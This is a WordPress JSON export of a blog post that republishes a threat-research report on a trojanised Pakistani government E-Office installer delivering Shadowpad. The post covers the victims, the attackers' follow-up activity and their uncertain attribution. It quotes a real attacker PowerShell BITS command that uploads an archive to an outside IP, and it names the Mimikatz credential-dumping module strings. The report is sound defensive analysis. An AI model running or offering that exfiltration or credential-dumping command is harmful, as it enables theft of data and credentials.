{"id":52763,"date":"2023-07-14T00:00:00","date_gmt":"2023-07-14T00:00:00","guid":{"rendered":"urn:uuid:c617590a-6619-c021-9c83-90b03f4819fa"},"modified":"2023-07-14T00:00:00","modified_gmt":"2023-07-14T00:00:00","slug":"supply-chain-attack-targeting-pakistani-government-delivers-shadowpad","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/","title":{"rendered":"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/Supply-Chain-Attack-Targeting-Pakistani-Government-Delivers-Shadowpad-976.png\"><\/p>\n<p>We did not search further, as the URL is self-explanatory. It is likely that the legitimate E-Office application connects to this IP address and port to search for updates. It also seems very unlikely that every Pakistani government organization that deploys E-Office has the same network mapping. However, we do not know if the address of the update server can be configured or if it was unintentionally left in as a debug feature by the developers.<\/p>\n<p>In any case, it was clever of the attackers to use an IP address that is hard-coded in a legitimate application used by their targets.<\/p>\n<p>On the defender\u2019s side, we recommend searching for POST requests to the IP address 10.2.101.110 on port 50000, as the legitimate application seems to send GET requests. 
It is also notable that in the case of a malicious installer, the connection happens right after launching the installation process, while in the case of a clean installer, the connection is only triggered after running the E-Office application.<\/p>\n<p><b><span class=\"body-subhead-title\">Targets<\/span><\/b><\/p>\n<p>We found three targets within our telemetry, all located in Pakistan; two are from the government\/public sector and are oriented toward finance, while one is from a telecommunications provider.<\/p>\n<p>The first victim we found was a Pakistani government entity, and we could confirm that the Shadowpad sample landed on the victim after the backdoored E-Office installer analyzed in a previous section was executed. The infection took place on September 28, 2022.<\/p>\n<p>The second victim was a Pakistani public sector bank. In this incident, different Shadowpad samples were detected on September 30, 2022 after E-Office was installed. We could not retrieve the related E-Office installer.<\/p>\n<p>Other related Shadowpad samples were detected at a Pakistani telecommunications provider in May 2022. Later analysis showed that one of them had been there since mid-February 2022. We were unable to find the infection vector for this incident.<\/p>\n<p><b><span class=\"body-subhead-title\">Post-exploitation and data exfiltration<\/span><\/b><\/p>\n<p>Within our telemetry, we noticed that the attacker used a portable Mimikatz variant the day following the appearance of a Shadowpad sample. Although we could not confirm it because we did not have access to the file, we found traces of the strings <i>privilege::debug<\/i> followed by <i>sekurlsa::logonpasswords<\/i>, which look like the Mimikatz <a href=\"https:\/\/tools.thehacker.recipes\/mimikatz\/modules\/sekurlsa\/logonpasswords\">sekurlsa<\/a> module that dumps LSASS secrets.<\/p>\n<p>Four days after that, we found traces of data exfiltration. 
The threat actor used a very simple PowerShell command that relies on the Background Intelligent Transfer Service (BITS).<\/p>\n<p><span class=\"blockquote\">powershell -nop -exec bypass \"\"import-module bitstransfer;start-bitstransfer -source c:\\windows\\help\\1019.rar -destination http:\/\/158.247.230.255\/1019.rar -transfertype upload\"\"<\/span><\/p>\n<p>We could not retrieve the exfiltrated file. However, by looking at OSINT sources, we learned that the threat actor likely had control over that IP address from late April 2022 to late October 2022.<\/p>\n<p><b><span class=\"body-subhead-title\">Attribution<\/span><\/b><\/p>\n<p>We did not find enough evidence to attribute this attack to a known threat actor.<\/p>\n<p>As mentioned earlier, since Shadowpad is a shared malware family, we cannot rely on it to attribute the attack to a particular threat actor.<\/p>\n<p>For two of the three victims of this campaign, we could not find any further malware samples or tactics, techniques, and procedures (TTPs) that could be helpful for the attribution of the campaign. In the third victim\u2019s environment, however, we found multiple malware families that we analyzed in our search for links to known threat actors.<\/p>\n<p>Notably, we found one dropper described by <a href=\"https:\/\/www.ptsecurity.com\/ww-en\/analytics\/calypso-apt-2019\/#id6\" target=\"_blank\" rel=\"noopener\">PTSecurity<\/a> and by <a href=\"https:\/\/st.drweb.com\/static\/new-www\/news\/2020\/july\/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf\" target=\"_blank\" rel=\"noopener\">Dr. Web<\/a> (under the name \u201cTrojan.Misisc.1\u201d) that we could attribute with high confidence to the Calypso threat actor. 
The payload was a simple keylogger.<\/p>\n<p>Another malware sample that we found turned out to be what PTSecurity describes as <a href=\"https:\/\/www.ptsecurity.com\/ww-en\/analytics\/pt-esc-threat-intelligence\/space-pirates-tools-and-connections\/#id3-7\" target=\"_blank\" rel=\"noopener\">Deed RAT<\/a> in the report on the Space Pirates threat actor. Our analysis shows that rather than a new malware family, it is likely that this is a Shadowpad variant obfuscated differently and using a different encryption scheme. We claim with low confidence that this piece of malware also belongs to the Calypso threat actor toolkit.<\/p>\n<p>The last malware family that we found belongs to the <a href=\"https:\/\/www.volexity.com\/blog\/2022\/06\/15\/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach\/\" target=\"_blank\" rel=\"noopener\">DriftingCloud<\/a> threat actor. As far as we know, DriftingCloud is not known to use Windows malware. Additionally, we found the same sample targeting a totally different location and industry, reinforcing our opinion that this sample is probably unrelated to the threat actor.<\/p>\n<p>Unfortunately, we could not find any clear links between these pieces of malware and the Shadowpad samples related to our threat actor. Therefore, we prefer to refrain from making any uncertain attribution claim.<\/p>\n<p><b>Bronze University Shadowpad sample<\/b><\/p>\n<p>In February 2022, Dell SecureWorks wrote a <a href=\"https:\/\/www.secureworks.com\/research\/shadowpad-malware-analysis\" target=\"_blank\" rel=\"noopener\">report<\/a> on Shadowpad, in which multiple threat actors are described as using this malware family. In the list of indicators of compromise (IOCs), we noticed that the payload <i>253f474aa0147fdcf88beaae40f3a23bdadfc98b8dd36ae2d81c387ced2db4f1<\/i> uses the new encryption scheme that we described previously, with a base encryption key that we attribute to our threat actor. 
The related C&amp;C domain names are live[.]musicweb[.]xyz and obo[.]videocenter[.]org. Kaspersky <a href=\"https:\/\/ics-cert.kaspersky.com\/publications\/reports\/2022\/06\/27\/attacks-on-industrial-control-systems-using-shadowpad\/\" target=\"_blank\" rel=\"noopener\">lists<\/a> those domain names in a report mentioning targets in the industrial and telecommunications sectors in both Pakistan and Afghanistan, but does not include strong attribution links.<\/p>\n<p>Dell SecureWorks attributes this sample to Bronze University, which matches the threat actor we call <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/a\/earth-lusca-sophisticated-infrastructure-varied-tools-and-techni.html\">Earth Lusca<\/a>.<\/p>\n<p>However, we question this attribution. All the other Shadowpad samples attributed to Bronze University in the IOC list are named <i>log.dll.dat<\/i>, while our payload is named <i>iviewers.dll.dat<\/i>. Moreover, none of those samples uses the new encryption scheme that we described previously. In fact, they use the old encryption scheme <a href=\"https:\/\/www.pwc.co.uk\/issues\/cyber-security-services\/research\/chasing-shadows.html\" target=\"_blank\" rel=\"noopener\">described<\/a> by PwC, using the <i>0x107e666d<\/i> constant. Finally, the C&amp;C domain names of the <i>253f474aa0147fdcf88beaae40f3a23bdadfc98b8dd36ae2d81c387ced2db4f1<\/i> payload do not match the usual Earth Lusca registration pattern that we know of.<\/p>\n<p>Thus, we prefer to refrain from attributing this whole attack to Earth Lusca. 
However, we will be happy to correct our assessment in the future if we have further proof of the links between this campaign and Earth Lusca.<\/p>\n<p><b><span class=\"body-subhead-title\">Conclusion<\/span><\/b><\/p>\n<p>From what we have seen so far, this whole campaign was the result of a very capable threat actor that managed to retrieve and modify the installer of a governmental application to compromise at least three sensitive targets.<\/p>\n<p>The fact that the threat actor has access to a recent version of Shadowpad potentially links it to the nexus of Chinese threat actors, although we cannot point to a particular group with confidence. However, we managed to show how the Shadowpad authors continue to update their piece of malware, making its reverse engineering more difficult. Finally, we detailed how this threat actor carefully chose one of its C&amp;C addresses to blend in with the legitimate network traffic, which shows great preparation capability.<\/p>\n<p>We expect to see more threat actors using this updated Shadowpad version in the future.<\/p>\n<p> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/g\/supply-chain-attack-targeting-pakistani-government-delivers-shad.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We recently found that an MSI installer built by the National Information Technology Board (NITB), a Pakistani government entity, delivered a Shadowpad sample, suggesting a possible supply-chain attack. 
Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":52764,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9508,9513,9509],"class_list":["post-52763","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-endpoints","tag-trend-micro-research-malware","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2023-07-14T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/Supply-Chain-Attack-Targeting-Pakistani-Government-Delivers-Shadowpad-976.png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Supply-Chain Attack Targeting Pakistani Government Delivers 
Shadowpad\",\"datePublished\":\"2023-07-14T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/\"},\"wordCount\":1151,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/07\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/\",\"name\":\"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/07\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png\",\"datePublished\":\"2023-07-14T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud 
Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/07\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/07\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png\",\"width\":976,\"height\":533},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence 
- Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH 
Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/","og_locale":"en_US","og_type":"article","og_title":"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2023-07-14T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/Supply-Chain-Attack-Targeting-Pakistani-Government-Delivers-Shadowpad-976.png","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad","datePublished":"2023-07-14T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/"},"wordCount":1151,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/07\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Endpoints","Trend Micro Research : Malware","Trend Micro Research : 
Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/","url":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/","name":"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/07\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png","datePublished":"2023-07-14T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/07\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/07\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png","width":976,"height":533},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security 
Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH 
Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/52763","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=52763"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/52763\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/52764"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=52763"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=52763"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=52763"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}